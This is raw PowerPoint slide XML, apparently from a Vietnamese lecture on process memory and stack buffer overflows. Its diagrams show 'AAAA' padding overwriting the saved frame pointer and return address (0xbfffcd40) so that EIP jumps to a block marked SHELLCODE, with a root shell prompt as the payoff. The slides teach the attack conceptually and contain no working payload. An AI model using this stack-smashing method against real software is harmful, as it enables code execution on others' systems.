              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: khôi phục EIP bằng RIP, bởi vậy EIP trỏ tới ô nhớ chứa shellcode.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DC3E25E-5E7B-1877-9A69-BC2A7CEDCAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8617410" y="3810000"/>
            <a:ext cx="221790" cy="1828800"/>
            <a:chOff x="8617409" y="4038600"/>
            <a:chExt cx="374191" cy="1828800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EAE6286-EAC1-6B2B-57C1-F1699B88A4ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8617409" y="4038600"/>
              <a:ext cx="374191"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A37E64-B7A8-9A6A-8783-71256B015FD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8991600" y="4038600"/>
              <a:ext cx="0" cy="18288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3C12422-E585-2142-A100-5DD0C0E53BA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8617409" y="5867400"/>
              <a:ext cx="362723"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CE899E6F-1EED-61D4-0FFF-91F8EFAC79C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="5484932"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D792435F-B67A-8034-1576-0E68C1028849}"/>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27" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF35C055-A4BA-2DB8-5B9D-C925D1E8EB69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="26"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sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Google Shape;1152;p88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C427F94-84CE-BA31-3A2D-7B8A77DF569E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1568522" y="940641"/>
            <a:ext cx="3825199" cy="2412159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="91425" rIns="182875" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sh # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0183E10E-7D8B-EFA9-4443-35653A3D045B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4278755334"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5896203" y="1219200"/>
          <a:ext cx="2721206"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7498">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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'\x00'</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3">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solidFill>
                            <a:schemeClr val="bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(RIP)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="1155CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t> 0xbfffcd40</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bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(SFP)</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     </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="accent4">
                            <a:lumMod val="60000"/>
                            <a:lumOff val="40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(name)    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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GB"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(n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ame) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="CC0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SHELLCODE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="accent4">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lang="en-GB" sz="140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5770166"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56367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289B-54F0-483F-A580-07E6712EE3CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cấp phát bộ nhớ cho tiến trình ntn?</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{888FA460-88C3-4461-92D1-41180EA92771}"/>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4" name="Rectangle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57B01B6A-18BC-8139-96E4-11454700A5A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143250" y="1067535"/>
            <a:ext cx="1943100" cy="4603531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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5" name="TextBox 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33DF7795-9C38-C60F-51A6-F63FB01405E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="5671066"/>
            <a:ext cx="2438400"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292934"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>RAM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292934"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(Physical Memory)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="292934"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Flowchart: Magnetic Disk 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EBA1CD0-59C7-D4E1-5BF1-1391DA941F07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="1708666"/>
            <a:ext cx="2057400" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="93A299"/>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7" name="TextBox 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AC4B043-02D5-10CD-39AC-4C775E9B96EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4223266"/>
            <a:ext cx="243840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292934"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>HDD</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="292934"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rectangle 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44970334-7FCC-1BC6-F26A-C7015D0C9A89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="2568833"/>
            <a:ext cx="1295400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D2533C">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:srgbClr>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Program A</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9" name="Rectangle 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{449593C7-9161-6072-1F3F-3FFEB267A6D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="3057520"/>
            <a:ext cx="1295400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>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Program B</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0" name="Rectangle 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE370B89-E030-DDB4-9BB3-1455CBBB6EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="3537466"/>
            <a:ext cx="1295400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>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Program C</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1" name="Rectangle 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA7B40C-093F-A6DB-C85F-36671B76580D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3257550" y="4407931"/>
            <a:ext cx="1676400" cy="990811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D2533C">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:srgbClr>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Process A</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2" name="Rectangle 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E42F7D3-0B37-37CF-E4B6-B8DDC40D1582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3257550" y="2171763"/>
            <a:ext cx="1676400" cy="580746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>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Process B</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3" name="Rectangle 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02C379ED-F2ED-6167-7868-C0BBE6B31F6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3257550" y="3362319"/>
            <a:ext cx="1676400" cy="773287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>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Process C</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4" name="Rectangle 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D4F3A2-6814-4716-3F25-30B7864A7D42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143250" y="1126151"/>
            <a:ext cx="1943100" cy="580746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>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a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a: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5" name="Rectangle 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97067500-A017-F2CB-BFC7-CE7194550156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7181850" y="1263134"/>
            <a:ext cx="1676400" cy="3926175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D2533C">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="26425" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="93A29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6" name="TextBox 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9A5D41D-A71E-4BA3-25F1-3C35D91184D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="5316983"/>
            <a:ext cx="2438400"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292934"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Virtual memory</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="292934"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Connector 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1153B1CF-C0FA-F79B-7389-535135CF2424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7181850" y="4164039"/>
            <a:ext cx="1676400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="26425" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="292934"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="Straight Connector 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E533054-E7B0-155D-929A-3E8CD7CA37CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7181850" y="4592598"/>
            <a:ext cx="1676400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="26425" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="292934"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="TextBox 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2B1135-B80A-DE06-76B1-2901BE2C7F06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209941" y="914400"/>
            <a:ext cx="152399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292934"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Process A</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="292934"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Rectangle 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A083370-A318-3307-BC5B-9A241088EAA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5492198" y="3857741"/>
            <a:ext cx="1409700" cy="941313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2642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292934"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Bộ chuyển đổi địa chỉ</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292934"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(OS + CPU)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="18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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Straight Arrow Connector 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BCE2CE8-9CC5-3767-5893-7778F10C7259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="60" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6901898" y="4328398"/>
            <a:ext cx="279952" cy="79533"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="292934"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62" name="Straight Arrow Connector 61">
